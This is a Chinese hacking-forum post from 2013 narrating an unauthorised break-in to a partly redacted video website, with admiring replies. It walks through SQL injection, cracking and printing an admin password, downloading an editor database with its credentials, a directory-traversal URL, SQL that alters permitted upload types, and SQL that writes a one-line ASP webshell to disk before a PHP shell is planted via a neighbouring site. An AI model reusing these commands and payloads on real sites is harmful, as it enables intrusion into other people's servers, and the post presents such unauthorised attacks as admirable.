一次搞站经过
本帖最后由 ilx 于 2013-2-11 14:53 编辑没啥技术含量。。
目标 :http://www.xxxxx.tv/
网站是asp脚本的iis搭建的吧
这有个文章 我们点进去试了下注入 好像不行。提示参数错误
http://www.xxxx.tv/news.asp?id=2774-1
应该是对id那个参数 做了限制 是否为整数 所以应该这个无法注入了
然后又看到了上面有个论坛 点进去 看了看
http://www.xxxx.tv/bbs/index.asp
试了下默认密码 和常用的弱口令 表示不行
http://www.XXXX.tv/guest/index.asp
然后又看那个留言板 有个管理的地方
同样的试了弱口令也不行
然后用扫描器把网站给扫描了一遍
有个Fckedifor编辑器目录 但是点进去就。。
editor这个目录也一样。。
这也没扫出来多大的用处。。
然后又在主页上看到了有个主持人的一个图片按钮。。
(图片经过处理)
发现他们主持人每人都有个独立的博客
有个管理登陆的地方还是习惯的试了弱口令 登陆不上。。
http://www.XXX.tv/bk/01/img/okimg.asp?id=6
看了下有注入 我就扔掉注入工具里 跑了。。
|hyz7881943|8d5e043e402c7d6b|密码解密后为 7881943
然后顺利的登陆后台了。。
有个上传图片的。。
传了个图片测试下。。
我们右键查看源码。。
靠。。有木有搞错。。(带值查询的然后得到图片地址? 以为路径存在数据库里了?原先以为)
没有路径也是白搭。。。
然后又试了几次上传 都不行。。然后我百度搜索了一下 showimg.asp 看他工作方式。。
发现是2进制存数据库里了 需要的时候再读出来 所以他根本就木有文件路径
。。。。链接 :showimg.asp资料
{:soso__6618209543613613949_2:}
然后又看到了一个上传的。。。
蛋疼出现同样的错误。。。
靠靠 。。。无奈啊。。于是又扫描了bk/01/这个目录
发现有个ewebedit编辑器 试了下弱口令不行 然后下载了数据库
账号是 china 密码是chinaboy
好啊。。此时心中激动啊。。
于是添加了个图片类型 aaspsp点确定。。
有木有搞错啊。。{:soso__6618209543613613949_2:}
然后试了他主持人的所有编辑器 都是一样。。。靠靠 天亡我也啊。。
然后突然想到这密码会不会和论坛密码一样。。然后。。。哈哈。。
保存就提示这。。靠。。
备份数据库 提示 备份失败,请确保服务器支持FSO,且 databackup 目录可写!
还有个sql执行可以用。。问题是现在不知道路径怎么搞?于是想到了 那个编辑器的遍历漏洞。。
http://www.XXXX.tv/bk/01/edit/admin_uploadfile.asp?id=14&dir=../../../../../..
原先想的是用sql 语句更新编辑器增加个文件类型。。
wwwroot\XXX\bk\01\edit\db\ewebeditor1013.mdb
没盘符。。就猜下了。。
update eWebEditor_Style in 'D:\wwwroot\XXX\bk\01\edit\db\ewebeditor1013.mdb' set s_imageext='gif|jpg|jpeg|bmp|aasasa' where s_id=40
靠。。。不能更新。。只读的?。。然后又用 这个语句
create table cmd (a varchar(50))// 创建一个名为cmd表
insert into cmd (a) values ('<%execute(request("X"))%>')//插入cmd表的a列 一句话木马
select * into in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd// 导出
drop table cmd //删除cmd表
难道是 目录全部都是只读权限?所以那编辑器出现错误? 还有那上传的也是 ?
然后配合编辑器的遍历漏洞 试了他的目录 发现可写的没有执行权限 或者你的ip被限制了那种。。。
然后又想到了旁站
(旁站那是phpcms的)
配合编辑器的遍历漏洞顺利找到路径 然后导出执行语句导出到那个网站 发现不支持asp脚本 然后换了个php的才算ok。。
感谢分享~~
思路比较全面,从注入、编辑器、弱口令、上传shell
还是比较全面的,加上提权就更好了 本帖最后由 冰刀 于 2013-1-31 18:02 编辑
看了在说update eWebEditor_Style in 'D:\wwwroot\XXX\bk\01\edit\db\ewebeditor1013.mdb' set s_imageext='gif|jpg|jpeg|bmp|aasasa' where s_id=40这个不错 收藏了.... 看看学习下, 看看:victory: 不错嘛,有意思 学习了,楼主厉害 因为回复可见!